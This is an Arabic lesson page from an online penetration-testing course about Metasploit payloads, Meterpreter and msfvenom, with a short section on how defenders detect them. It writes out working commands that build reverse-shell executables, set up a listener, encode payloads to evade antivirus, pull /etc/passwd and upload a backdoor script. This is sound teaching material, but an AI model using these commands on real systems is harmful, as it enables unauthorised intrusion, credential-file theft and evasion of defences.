الحمولات: المرحلية وغير المرحلية وMeterpreter
اختر الحمولة المناسبة للسيناريو، واستخدم Meterpreter في مرحلة ما بعد الاستغلال.
الحمولات: المرحلية وغير المرحلية وMeterpreter درس مجاني في Cyber Security Academy على CoddyKit. هذا هو الدرس 3 من أصل 4. يمكنك قراءة الدرس كاملاً أدناه مجاناً — ثم تمرن عليه مباشرة في المتصفح باستخدام محرر أكواد مدمج ومدرس ذكاء اصطناعي متاح 24/7. هذا الدرس جزء من مسار التعلم في Cyber Security Academy، وتقدمك يتزامن عبر الويب وتطبيق CoddyKit. تتضمن دورة Cyber Security Academy 4 دروس في المجموع.
ما هي الحمولة؟
الحمولة هي الشفرة التي تعمل على الهدف بعد نجاح الاستغلال. وهي تحدد ما يحصل عليه المهاجم: shell أو تنفيذ الأوامر أو الوصول إلى الملفات أو وكيل متكامل الميزات مثل Meterpreter.
الحمولات Staged وStageless
تحتوي حمولات Stageless (/) على كل شيء في ملف ثنائي واحد — وهي أكبر حجمًا لكنها أبسط، ولا تحتاج إلى استدعاء شبكي بعد التسليم الأولي. أما الحمولات Staged (//) فترسل مكوّن تمهيد صغيرًا أولًا، ثم ينزّل المرحلة الثانية من المعالج.
# Stageless (single slash naming):
windows/x64/shell_reverse_tcp
# Staged (double slash naming):
windows/x64/shell/reverse_tcp
# ^
# stage 2 downloaded after stager connectsمتى تستخدم كل نوع
استخدم Stageless عندما لا يملك الهدف وصولًا إلى الإنترنت أو المعالج بعد الاستغلال الأولي — إذ يجب أن تكون الحمولة مكتفية ذاتيًا. واستخدم Staged عندما تريد حمولة أولية أصغر وتملك اتصالًا موثوقًا بالمعالج.
نظرة عامة على Meterpreter
Meterpreter هو الحمولة المتقدمة في Metasploit؛ إذ يعمل بالكامل في الذاكرة، ويوفر اتصالات مشفّرة، ويقدم API غنيًا يشمل الوصول إلى نظام الملفات، وترحيل العمليات، وتسجيل ضغطات المفاتيح، والتقاط لقطات الشاشة، والارتكاز الشبكي.
msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.10
msf6 > set LPORT 4444
msf6 > runأوامر Meterpreter
أوامر Meterpreter الأساسية لمرحلة ما بعد الاستغلال تشمل معلومات النظام، وقائمة العمليات، وعمليات الملفات، والشبكات.
meterpreter > sysinfo # system information
meterpreter > getuid # current user
meterpreter > ps # process list
meterpreter > download /etc/passwd
meterpreter > upload backdoor.sh /tmp/
meterpreter > shell # drop to OS shellترحيل العمليات
رحّل عملية Meterpreter إلى عملية أكثر استقرارًا أو أقل إثارة للشك (مثل explorer.exe في Windows). ويمكن أن يؤدي ذلك أيضًا إلى رفع الامتيازات عند الترحيل إلى عملية ذات امتيازات أعلى.
meterpreter > ps
meterpreter > migrate 1234 # migrate to PID 1234
# Migrate to explorer.exe for stability
# Avoids termination if original process exitsإنشاء الحمولات باستخدام msfvenom
ينشئ msfvenom ملفات حمولات مستقلة (EXE وELF وAPK وshellcode) لتسليمها عبر التصيد الاحتيالي أو إسقاطات USB أو web shells في الاختبارات المصرح بها.
# Windows reverse shell EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-f exe -o payload.exe
# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-f elf -o payload.elfاستخدام multi/handler لالتقاط جلسات shell
تلتقط الوحدة المساعدة multi/handler اتصالات reverse shell. هيّئها باستخدام الحمولة نفسها وLHOST وLPORT التي استخدمتها في msfvenom قبل تسليم الحمولة.
msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 0.0.0.0
msf6 > set LPORT 4444
msf6 > run -j # run as background jobأساسيات الترميز والتخفي
يمكن لأدوات الترميز في msfvenom تمويه الحمولات لتجاوز اكتشاف AV الأساسي المعتمد على التواقيع. ملاحظة: يستخدم EDR الحديث الاكتشاف السلوكي، لذا لا تكفي أدوات الترميز وحدها أمام وسائل الدفاع المتقدمة.
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-e x64/xor_dynamic -i 5 \
-f exe -o encoded_payload.exeالحمولات Bind وReverse
تتصل حمولات Reverse من الهدف إلى المهاجم (وهو أفضل مع NAT والجدران النارية). أما حمولات Bind فتنصت على الهدف، ويتصل المهاجم به. ويُفضّل Reverse في معظم السيناريوهات.
اكتشاف الحمولات من جانب المدافعين
يكتشف المدافعون Meterpreter عبر: تواقيع الشبكة (أنماط حركة C2)، وفحص الذاكرة (آثار حقن DLL الانعكاسي)، والتحليل السلوكي (تفريغ العمليات، والعلاقات غير المعتادة بين العمليات الأصلية والفرعية).
تحقق سريع
ما الذي يميز الحمولة Staged عن الحمولة Stageless في Metasploit؟
ملخص: الحمولات وMeterpreter
اختر الحمولات Staged للحصول على بصمة أولية صغيرة، وStageless للتسليم المكتفي ذاتيًا. يُعد Meterpreter الحمولة الأكثر قدرة لمرحلة ما بعد الاستغلال: يعمل في الذاكرة، ومشفر، وقابل للتوسعة. استخدم msfvenom لإنشاء ملفات ثنائية مستقلة، وهيّئ دائمًا multi/handler لالتقاط الاتصالات العكسية.
الأسئلة الشائعة
هل درس «الحمولات: المرحلية وغير المرحلية وMeterpreter» مجاني؟
نعم — نص درس «الحمولات: المرحلية وغير المرحلية وMeterpreter» كامل متاح مجاناً هنا على الويب. لتمرينه بشكل تفاعلي (محرر أكواد مدمج ومدرس ذكاء اصطناعي متاح 24/7) وفتح باقي دورة Cyber Security Academy، انتقل إلى CoddyKit PRO. تتضمن دورة Cyber Security Academy 4 دروس في المجموع.
ماذا ستتعلم في «الحمولات: المرحلية وغير المرحلية وMeterpreter»؟
اختر الحمولة المناسبة للسيناريو، واستخدم Meterpreter في مرحلة ما بعد الاستغلال. تتمرن على Cyber Security Academy مع أكواد عملية تشغلها مباشرة في المتصفح، ومدرس ذكاء اصطناعي متاح 24/7 يجيب على أسئلتك أثناء عملك.
هل أحتاج إلى خبرة سابقة لأبدأ Cyber Security Academy؟
لا تُشترط خبرة سابقة. Cyber Security Academy على CoddyKit منظم للمبتدئين حتى المتقدمين، لذا يمكنك البدء من هنا أو من البداية والتقدم بسرعتك الخاصة. هذا هو الدرس 3 من أصل 4.
كم من الوقت يستغرق درس «الحمولات: المرحلية وغير المرحلية وMeterpreter»؟
معظم دروس CoddyKit تستغرق حوالي 5–10 دقائق. كل منها موجز وتفاعلي، لذا تحرز تقدماً مستمراً وتستأنف من حيث توقفت عبر الويب والتطبيق.
هل يمكنني كتابة وتشغيل أكواد في درس Cyber Security Academy هذا؟
نعم. كل درس في Cyber Security Academy يتضمن محرر أكواد مدمج، لذا تكتب وتشغل أكواداً حقيقية مباشرة في متصفحك وتحصل على تعليقات فورية من الذكاء الاصطناعي — بدون إعداد محلي.
جميع الدروس في هذه الدورة
- بنية Metasploit وmsfconsole
- استغلال ثغرة معروفة
- الحمولات: المرحلية وغير المرحلية وMeterpreter
- ما بعد الاستغلال: التمحور والاستمرارية